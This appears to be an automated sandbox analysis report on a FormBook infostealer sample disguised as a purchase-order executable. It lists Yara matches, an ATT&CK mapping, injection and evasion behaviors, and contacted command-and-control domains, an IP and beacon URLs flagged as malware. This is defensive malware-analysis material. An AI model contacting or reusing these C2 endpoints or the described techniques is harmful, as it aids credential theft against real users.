          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 10.2.PO_101&102.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.PO_101&102.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.PO_101&102.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.PO_101&102.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.PO_101&102.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.PO_101&102.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO_101&102.exe.45ada08.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.PO_101&102.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000000.307243585.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.371409464.0000000001530000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.558614233.0000000002E40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.312254656.0000000004500000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.555083742.00000000001A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.559409706.0000000002F40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.352889129.0000000007949000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.370759398.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.335987438.0000000007949000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.371246188.0000000001500000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.308236166.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 10.2.PO_101&102.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.PO_101&102.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.PO_101&102.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.PO_101&102.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.PO_101&102.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.PO_101&102.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO_101&102.exe.45ada08.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.PO_101&102.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000000.307243585.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.371409464.0000000001530000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.558614233.0000000002E40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.312254656.0000000004500000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.555083742.00000000001A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.559409706.0000000002F40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.352889129.0000000007949000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.370759398.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.335987438.0000000007949000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.371246188.0000000001500000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.308236166.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1Input Capture1Process Discovery2Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion41SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion41NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing2Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 510600 Sample: PO_101&102.exe Startdate: 28/10/2021 Architecture: WINDOWS Score: 100 33 www.francinegeorges.com 2->33 37 Found malware configuration 2->37 39 Malicious sample detected (through community Yara rule) 2->39 41 Antivirus detection for URL or domain 2->41 43 10 other signatures 2->43 11 PO_101&102.exe 3 2->11         started        signatures3 process4 file5 31 C:\Users\user\AppData\...\PO_101&102.exe.log, ASCII 11->31 dropped 55 Tries to detect virtualization through RDTSC time measurements 11->55 57 Injects a PE file into a foreign processes 11->57 15 PO_101&102.exe 11->15         started        18 PO_101&102.exe 11->18         started        signatures6 process7 signatures8 59 Modifies the context of a thread in another process (thread injection) 15->59 61 Maps a DLL or memory area into another process 15->61 63 Sample uses process hollowing technique 15->63 65 Queues an APC in another process (thread injection) 15->65 20 explorer.exe 15->20 injected process9 dnsIp10 35 www.reynbetgirisi.com 185.178.208.163, 49816, 80 DDOS-GUARDRU Russian Federation 20->35 45 System process connects to network (likely due to code injection or exploit) 20->45 24 svchost.exe 20->24         started        signatures11 process12 signatures13 47 Self deletion via cmd delete 24->47 49 Modifies the context of a thread in another process (thread injection) 24->49 51 Maps a DLL or memory area into another process 24->51 53 Tries to detect virtualization through RDTSC time measurements 24->53 27 cmd.exe 1 24->27         started        process14 process15 29 conhost.exe 27->29         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PO_101&102.exe36%ReversingLabsByteCode-MSIL.Spyware.Noon
          PO_101&102.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          10.0.PO_101&102.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          10.0.PO_101&102.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          10.2.PO_101&102.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          10.0.PO_101&102.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.comy0%URL Reputationsafe
          http://www.tiro.comn0%URL Reputationsafe
          https://www.reynbetgirisi.com/snr6/?jDH8=E19JCPWLLAvTbcnEEa/roDJkoR1wzkcHqaxLe1hmnUekSrF100%Avira URL Cloudmalware
          http://www.tiro.com0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/H0%URL Reputationsafe
          http://www.tiro.comF0%URL Reputationsafe
          http://www.fonts.com-uI0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/90%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/_0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.reynbetgirisi.com/snr6/?jDH8=E19JCPWLLAvTbcnEEa/roDJkoR1wzkcHqaxLe1hmnUekSrF+l+57NdrJs1Xds1ailiks&l0D0=fJBTE100%Avira URL Cloudmalware
          http://www.jiyu-kobo.co.jp/00%URL Reputationsafe
          www.reynbetgirisi.com/snr6/100%Avira URL Cloudmalware
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://tempuri.org/DatabaseDataSet.xsd0%Avira URL Cloudsafe
          http://www.fonts.comn0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.fontbureau.com50%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/c0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.sandoll.co.krE0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.fonts.com-u0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.reynbetgirisi.com
          185.178.208.163
          truetrue
            unknown
            www.francinegeorges.com
            unknown
            unknowntrue
              unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.reynbetgirisi.com/snr6/?jDH8=E19JCPWLLAvTbcnEEa/roDJkoR1wzkcHqaxLe1hmnUekSrF+l+57NdrJs1Xds1ailiks&l0D0=fJBTEtrue
              • Avira URL Cloud: malware
              unknown
              www.reynbetgirisi.com/snr6/true
              • Avira URL Cloud: malware
              low

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.apache.org/licenses/LICENSE-2.0PO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpfalse
                high
                http://www.fontbureau.comPO_101&102.exe, 00000001.00000003.309471550.0000000006450000.00000004.00000001.sdmpfalse
                  high
                  http://www.fontbureau.com/designersGPO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpfalse
                    high
                    http://www.fontbureau.com/designers/?PO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpfalse
                      high
                      http://www.founder.com.cn/cn/bThePO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.tiro.comyPO_101&102.exe, 00000001.00000003.286197487.000000000646B000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.fontbureau.com/designers?PO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpfalse
                        high
                        http://www.tiro.comnPO_101&102.exe, 00000001.00000003.285505347.000000000646B000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://www.reynbetgirisi.com/snr6/?jDH8=E19JCPWLLAvTbcnEEa/roDJkoR1wzkcHqaxLe1hmnUekSrFsvchost.exe, 0000000F.00000002.561711505.000000000411F000.00000004.00020000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        http://www.tiro.comPO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.jiyu-kobo.co.jp/HPO_101&102.exe, 00000001.00000003.288893237.0000000006454000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.fontbureau.com/designersPO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpfalse
                          high
                          http://www.tiro.comFPO_101&102.exe, 00000001.00000003.285531786.000000000646B000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.fonts.com-uIPO_101&102.exe, 00000001.00000003.285166630.000000000646B000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.goodfont.co.krPO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.jiyu-kobo.co.jp/jp/PO_101&102.exe, 00000001.00000003.288893237.0000000006454000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.carterandcone.comlPO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.sajatypeworks.comPO_101&102.exe, 00000001.00000003.285223985.0000000006474000.00000004.00000001.sdmp, PO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.jiyu-kobo.co.jp/9PO_101&102.exe, 00000001.00000003.288893237.0000000006454000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.typography.netDPO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.com/designers/cabarga.htmlNPO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpfalse
                            high
                            http://www.founder.com.cn/cn/cThePO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.jiyu-kobo.co.jp/jp/_PO_101&102.exe, 00000001.00000003.288893237.0000000006454000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.galapagosdesign.com/staff/dennis.htmPO_101&102.exe, 00000001.00000003.309471550.0000000006450000.00000004.00000001.sdmp, PO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://fontfabrik.comPO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers&PO_101&102.exe, 00000001.00000003.290680081.0000000006459000.00000004.00000001.sdmpfalse
                              high
                              http://www.founder.com.cn/cnPO_101&102.exe, 00000001.00000003.287344198.0000000006454000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.com/designers/frere-jones.htmlPO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpfalse
                                high
                                http://www.jiyu-kobo.co.jp/0PO_101&102.exe, 00000001.00000003.288893237.0000000006454000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.jiyu-kobo.co.jp/PO_101&102.exe, 00000001.00000003.288893237.0000000006454000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://tempuri.org/DatabaseDataSet.xsdPO_101&102.exefalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.fonts.comnPO_101&102.exe, 00000001.00000003.285275223.000000000646B000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.galapagosdesign.com/DPleasePO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designers8PO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.fonts.comPO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.sandoll.co.krPO_101&102.exe, 00000001.00000003.286605823.0000000006456000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com5PO_101&102.exe, 00000001.00000003.309471550.0000000006450000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
